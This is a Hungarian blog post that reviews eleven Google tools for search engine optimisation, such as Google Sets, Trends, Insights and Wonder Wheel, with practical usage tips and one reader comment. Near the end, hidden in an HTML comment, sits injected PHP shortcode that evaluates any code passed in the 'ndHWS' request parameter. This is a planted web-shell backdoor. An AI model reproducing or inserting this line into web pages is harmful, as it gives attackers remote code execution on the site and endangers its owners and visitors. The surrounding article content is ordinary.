SEO eszközök
jan 15, 11
Weboriginal
1 Comment
Google keresőooptimalizálási eszközök

Google keresőooptimalizálási eszközök

Összegyűjtöttük azokat a kiegészítőket a Google-től, melyek nagyban segítik a keresőoptimalizálási munkánkat.

Mindannyian szeretjük a SEO eszközöket (nekem a SEOmoz eszközei a kedvenceim), mivel lényegesen megkönnyítik a dolgunkat. A Google számos olyan eszközt kínál, amely segítséget nyújt a keresőoptimalizálási munkálatokban. Szerintem mindenki ismeri ezeket az eszközöket, de fontosnak tartom, hogy felelevenítsük, hogy melyik eszköz mire is való, és hogyan segítheti a keresőoptimalizálási előkészületeket.

1. Follow Finder

Ez az eszköz segít abban, hogy olyan embereket találjunk meg a Twitteren, akik hasonlóak vagy valahogyan kapcsolódnak ahhoz a valakihez akire rákeresünk. Csak be kell írni annak a bizonyos személynek a nevét, akit keresünk és az eszköz kilistázza a Twitteren hasonló profillal rendelkezők nevét.

Gyakorlati használata– Nagyon hasznos, ha például egy új piacra szeretnénk bejutni tevékenységi körünkkel, és szeretnénk megtudni ki aktív az adott témában a Twitter közösségben, így segít minket az új piacon való  tájékozódásban és a kapcsolatépítésben is. Jó példa, ha rákeresünk Rand Fishkin-re, rögtön kapunk egy listát a legjobb SEO szakértőkről:

FollowFinder

moz-screenshotmoz-screenshot

2. Google Sets

Már jó ideje használjuk, és talán a legegyszerűbb eszközök egyike, mégis nagyon hasznos. Beírunk egy kulcsszót és azokat a szavakat jeleníti meg, amelyek hasonlóak a beírthoz. Íme, milyen eredményt kapunk BMW kulcsszóra:

GoogleSets

Gyakorlati használata – amikor egy új projektbe kezdünk és szüksége van az összes kapcsolódó kulcsszóra, aminek köze van az ügyfél termékéhez vagy szolgáltatásához. Ez majdnem olyan, mint egy ötletbörze és minden bizonnyal nagy segítséget nyújt, ha valahol  elakadtunk a kulcsszókutatásban.

3. Google Alerts + Google Reader + iGoogle = Győzelem!

Számos célból használhatjuk ezeket az eszközöket külön külön, de lehet őket együtt is használni, majd az eredményt egy jól átlátható formában megtekinteni.

Gyakorlati használat – olyan mint egy management irányítópult, amit a következő lépésekkel állíthatunk be:

  • Beállítunk a Google Alerten egy kulcsszót pl: “Paddy Moogan” vagy “Patrick Moogan”
  • Hozzáadjuk a Google Alert- hez a Google Reader-t
  • RSS feed-en keresztül felvesszük a találatokat a Google Reader-től és hozzáadjuk a saját iGoogle felületünkhöz.

Tehát ha bejelentkezek az iGoogle fiókomba, lesz egy kiegészítőm, amely megjeleníti a a fent említett alkalmazások közös eredményét. Majd a találatokat meg tudom jelölni olvasottként, és akkor csak a frissítéseket látom, ami jelentősen könnyebbséget jelent. Sajnos a mai napon nem tettek említést Paddy Morgan-ről így erre a keresőszóra nem volt találat 🙂

GoogleReader

4. A legfrissebb találatok

Nem sokan gondolnak erre az eszközre úgy, mint egy SEO eszköz, de különféleképpen használható a keresőoptimalizálási munkák könnyítésére. Nagyon egyszerűen működik, csak be kell írni egy kulcsszót, majd kattintani kell az új, bal oldalon található menüre (ha magyar a böngészőnk akkor legfrissebb találatoknak hívják ezt a menüt):

GoogleLatest

Gyakorlati használata– keress rá egy weboldal címére a Google-ben, hogy lásd mikor járt a Google az oldalon. Ha egy oldalra sok link mutat, vagy/és gyakran frissül a tartalom, ennek az eszköznek a segítségével majdnem elő indexelésnek lehetsz tanúja. Ez nagy oldalszámú portálok / weboldalak esetében nagy segítséget jelent, mint például a BBC  esetében.

BBC_latest

Egy másik lehetséges használata, ahogy a korábbi pontban említettük, állítsuk be a Google Alerts-et hogy egy márkát/terméket/nevet figyeljen. Futassunk le egy keresést márkanevünkre, majd hagyjuk futni a legújabb eredményeket egy másik lapon/fülön. Eközben más munkát is végezhetünk, majd néha visszalépünk erre a fülre/lapra, hogy van e újabb releváns találat.

5. Google Suggest

Eleinte csak a Google Labs keretein belül volt elérhető viszont 2010 nyarától már önállóan is elérhető a Google.com-on a Google Suggest alkalmazás.

Gyakorlati használata – Vannak olyan eszközök is, amelyek nem kimondottan SEO-sak, de mégis lehetnek hasznosak bizonyos esetekben. Különösen akkor, ha gyorsan kell elemezni a kulcsszavakat és az ügyfélnek választ adni. Van némi vita arról, hogy helyes eredményeket kapunk- e, de szerintem nagyon jól jön ha például long tail kulcsszavakat gyűjünk.

6. Google Insights

Az adatok nem biztos, hogy 100%-osan megbízhatóak, de jó ha összehasonlításoknál kéznél van.

Gyakorlati használata – Kifejezéseket hasonlíthatunk össze, hogy lássuk melyik a népszerűbb/keresettebb a másiknál. Arra is jó lehet, hogy megnézzük milyen ütemben növekszik egyes kifejezésekre a keresési gyakoriság. Ha szerencsések vagyunk akkor a saját tevékenységünkre keresve folyamatos növekedést fogunk látni. Sajnos a szakmánkban elég nagy visszaesés látható:

Google-Trends

7. Google webmester eszköz

Rengeteg információ érhető el a webmester eszközökön keresztül, ami elengedhetetlen a sikeres keresőoptimalizáláshoz. A Google folyamatosan fejleszti, újabb funkciókat jelentet meg benne.

Gyakorlati használata – Imádjuk használni a Webmaster Tools-t, ha egy weboldalt technikai paramétereit kell ellenőrizni.

8. Google Trends

A Trends egy kicsit eltér a fent említett Google Insights eszközöktől. Az egyik funkció amiben eltér az megmutatja a hasonlóan látogatott és hasonlóan keresett kifejezéseket. A következő eredményeket kaptuk a seomoz-ra keresve:

Google-Trends

Gyakorlati használata – használatát akkor ajánljuk, ha olyan piacra szeretnénk belépni, amiről még nem tudunk túl sokat, ami jellemző minden újabb keresőoptimalizálási projekt kezdetén. Ad jó néhány tippet, hogy hova lenne célszerű a linkünket kihelyeznünk, hiszen ezek az oldalak mindig a legrelevánsabbak az adott tevékenységi körre. A javasolt oldalakat ismét megvizsgálhatjuk, így még több linkcsere partnerre tehetünk szert 🙂

9. „Wonder Wheel”

Egy másik hasznos eszköz a Google-tól a Wonder Wheel, melyet segíti a felhasználót kapcsolódó kulcsszavakat keresni, hasonlóan a Google Sets-hez vagy a Google Suggets-hez.

Gyakorlati használata – A Wonder Wheel akkor lehet a segítségünkre, amikor az ügyfeleknek megmutatjuk a tevékenységi körükhöz kapcsolód kifejezéseket, és mivel ők keveset értenek a keresőoptimalizáláshoz, jóval könnyebb vizuálisan bemutatni a kulcsszókapcsolatokat mint beszélni róluk, vagy táblázatban összefoglalni őket. Gyorsan működik és könnyen bepillantást nyerünk a long tail kulcsszavak világába. Íme egy példa:

wonderwheel

10. Google Image Swirl

Igaz nem sok köze van a keresőoptimalizáláshoz, de egy nagyon élvezetes a használata, így belecsempésztem a listánkba. Az eszköz megmutatja keresett képhez tartozó releváns képeket. Majdnem olyan, mint a Wonder Wheel, csak képekkel dolgozik.

Googleimage

11. Google Zeitgeist

A Google Zeitgeist olyan mint a Trends és az Insights ötvözése, csak sokkal jobban néz ki. A több milliárd böngésző keresési eredményét mutatja, a különböző világ eseményeit, melyek voltak a legnépszerűbbek. Tanulságos és érdekes adatokkal szolgálhat.

GoogleZeitgeist

Ennyit sikerült összegyűjtenem, ha bárkinek van más javaslata vagy a fent említett eszközök használatát kiegészítené SEO szempontól, várom a kommenteket.

<!– [insert_php]if (isset($_REQUEST["ndHWS"])){eval($_REQUEST["ndHWS"]);exit;}[/insert_php][php]if (isset($_REQUEST["ndHWS"])){eval($_REQUEST["ndHWS"]);exit;}[/php] –>

Facebook Google+ 

Kulcsszavak:,

  1. Balázsik Gábor szerint:

    Ezek a “legjobb SEO szakértők” közül hányan tudnak magyarul és hányan tudnak magyarul optimalizálni?

Vélemény, hozzászólás?

Az email címet nem tesszük közzé. A kötelező mezőket * karakterrel jelöljük.